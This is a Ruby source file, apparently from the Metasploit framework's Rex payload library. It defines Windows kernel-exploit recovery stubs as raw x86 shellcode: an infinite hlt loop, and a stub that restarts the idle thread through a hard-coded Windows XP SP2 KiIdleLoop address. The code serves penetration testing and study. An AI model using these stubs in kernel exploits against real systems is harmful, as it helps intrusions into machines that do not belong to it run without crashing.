Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
# -*- coding: binary -*-
2
module Rex
3
module Payloads
4
module Win32
5
module Kernel
6

7
#
8
# Recovery stubs are responsible for ensuring that the kernel does not crash.
9
# They must 'recover' after the exploit has succeeded, either by consuming
10
# the thread or continuing it on with its normal execution.  Recovery stubs
11
# will often be exploit dependent.
12
#
13
module Recovery
14

15
  #
16
  # The default recovery method is to spin the thread
17
  #
18
  def self.default(opts = {})
19
    spin(opts)
20
  end
21

22
  #
23
  # Infinite 'hlt' loop.
24
  #
25
  def self.spin(opts = {})
26
    "\xf4\xeb\xfd"
27
  end
28

29
  #
30
  # Restarts the idle thread by jumping back to the entry point of
31
  # KiIdleLoop.  This requires a hard-coded address of KiIdleLoop.
32
  # You can pass the 'KiIdleLoopAddress' in the options hash.
33
  #
34
  def self.idlethread_restart(opts = {})
35
    # Default to fully patched XPSP2
36
    opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?
37

38
    "\x31\xC0" +                                     # xor eax,eax
39
    "\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
40
    "\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
41
    "\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
42
    "\x6A\x00" +                                     # push byte +0x0
43
    "\xFF\xE0"                                       # jmp eax
44
  end
45

46
end
47

48
end
49
end
50
end
51
end
52

53